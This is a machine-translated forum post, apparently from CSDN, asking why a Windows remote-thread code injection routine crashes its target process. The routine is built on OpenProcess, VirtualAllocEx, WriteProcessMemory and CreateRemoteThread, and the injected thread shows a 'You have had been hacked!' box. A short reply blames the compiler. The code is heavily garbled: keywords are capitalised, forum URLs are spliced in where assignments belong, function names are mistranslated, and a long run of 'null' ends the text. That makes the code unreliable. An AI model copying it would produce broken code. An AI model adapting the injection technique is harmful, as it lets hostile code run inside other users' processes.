# define STRLEN 100
Typedef struct _DATA while forming {
DWORD dwLoadLibrary;
DWORD dwGetProcAddress;
DWORD dwGetModuleHandle;
DWORD dwGetModuleFileName;
Char User32Dll [STRLEN];
Char MessageBox1 [STRLEN];
Char Text [STRLEN];
Char Caption [STRLEN];
} DATA, * PDATA;
DWORD WINAPI RemoteThreadProc (LPVOID lpParam);
Void InjectCode1 (DWORD dwPid) {
//by using PID value, access to handle to the process of injection
HANDLE hProcess=OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwPid);
If (hProcess==NULL) {
AfxMessageBox (" process opens failed!" ); return;
}
DATA, DATA=https://bbs.csdn.net/topics/{0};//access to use the API function to handle
Data. DwLoadLibrary=(DWORD) GetProcAddress call (GetModuleHandle (" kernel32. DLL "),
"LoadLibraryA");
Data. DwGetProcAddress=(DWORD) GetProcAddress call (
GetModuleHandle (" kernel32. DLL) ", "GetProcAddress call");
Data. DwGetModuleHandle=(DWORD) GetProcAddress call (GetModuleHandle (" kernel32. DLL "),
"GetModuleHandleA"); Data. DwGetModuleFileName=(DWORD) GetProcAddress call (
GetModuleHandleA (" kernel32. DLL) ", "GetModuleFileNameA");
//definition dialog
Lstrcpy (Data) User32Dll, "user32. DLL");
Lstrcpy (Data) MessageBox1, "MessageBoxA");
Lstrcpy (Data. The Text, "You have had been hacked! (by j. y.) ");
Lstrcpy (Data. The Caption, "Warning");//application data structure of memory space
LPVOID lpData=https://bbs.csdn.net/topics/VirtualAllocEx (hProcess,//process to the allocate memory
NULL,//desired starting address
Sizeof (DATA),//the size of the region to the allocate
MEM_COMMIT | MEM_RESERVE,//the type of allocation
PAGE_READWRITE);//the type of access protection,
If (lpData=NULL https://bbs.csdn.net/topics/=
{AfxMessageBox (" application data area failed!" );
The CloseHandle (hProcess); return;
}
DWORD dwWriteNum=0; if (! WriteProcessMemory (hProcess, lpData, & amp; Data, sizeof (Data), & amp; DwWriteNum))
{
AfxMessageBox (" writing processes data structure failure!" );
//fail the release of the original application area of memory, revocation of memory pages submitted state
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
The CloseHandle (hProcess); return;
}
//the application thread function of memory space
DWORD dwFunSize=0 x6000;
LPVOID lpCode=VirtualAllocEx (hProcess, NULL,
DwFunSize MEM_COMMIT,
PAGE_EXECUTE_READWRITE); If (lpCode==NULL)
{
AfxMessageBox (" regional application function failure!" );
//failure will release the original application area of memory to memory pages submitted state
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT);
The CloseHandle (hProcess); return;
} the if (! WriteProcessMemory (hProcess, lpCode RemoteThreadProc dwFunSize, & amp; DwWriteNum))
{
AfxMessageBox (" thread function writes process failed!" );
//fail the release of the original application area of memory, revocation of memory pages submitted state
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT); The CloseHandle (hProcess);
return;
}
HANDLE hRemoteThread=CreateRemoteThread (hProcess, NULL,
0, (LPTHREAD_START_ROUTINE) lpCode,
LpData, 0,
NULL); If (hRemoteThread==NULL)
{
AfxMessageBox (" failed to create the remote thread!" );
//release the original application area of memory, revocation of memory pages submitted state
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT); The CloseHandle (hProcess);
return;
}
AfxMessageBox (" injection successfully!" );
//waiting thread to exit the
The WaitForSingleObject (hRemoteThread, INFINITE);
//release the original application area of memory, revocation of memory pages submitted state
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT);
The CloseHandle (hRemoteThread); The CloseHandle (hProcess);
}
DWORD WINAPI RemoteThreadProc (LPVOID lpParam) {
PDATA PDATA=https://bbs.csdn.net/topics/(PDATA lpParam);
//define the API function prototype
HMODULE (__stdcall * MyLoadLibrary) (LPCTSTR);
FARPROC (__stdcall * MyGetProcAddress) (HMODULE, LPCSTR);
HMODULE (__stdcall * MyGetModuleHandle) (LPCTSTR);
Int (__stdcall * MyMessageBox) (HWND, LPCTSTR LPCTSTR, UINT);
DWORD (__stdcall * MyGetModuleFileName) (HMODULE LPTSTR, dwords);
MyLoadLibrary=(HMODULE __stdcall * (LPCTSTR)) pData - & gt; DwLoadLibrary;
MyGetProcAddress=(FARPROC __stdcall * (HMODULE, LPCSTR)) pData - & gt; DwGetProcAddress;
MyGetModuleHandle=(HMODULE __stdcall * (LPCSTR)) pData - & gt; DwGetModuleHandle;
MyGetModuleFileName=(DWORD (__stdcall *) (HMODULE LPTSTR, dwords nSize)) pData - & gt; DwGetModuleFileName;
HMODULE HMODULE=MyLoadLibrary (pData - & gt; User32Dll);
MyMessageBox=(int (__stdcall *) (HWND, LPCTSTR LPCTSTR, UINT)) MyGetProcAddress (hModule, pData - & gt; MessageBox1);
Char szModuleName [MAX_PATH]={0};
MyGetModuleFileName (NULL, szModuleName MAX_PATH);
MyMessageBox (0, pData - & gt; Text, pData - & gt; Caption, 0);
return 0;
}
The last call InjectCode1 (dwPid);
The remote program crashes,
CodePudding user response:
Remove the program AfxMessageBox under VC6.0 to succeed under vs2015 would have failed it has to do with the compiler?nullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnullnull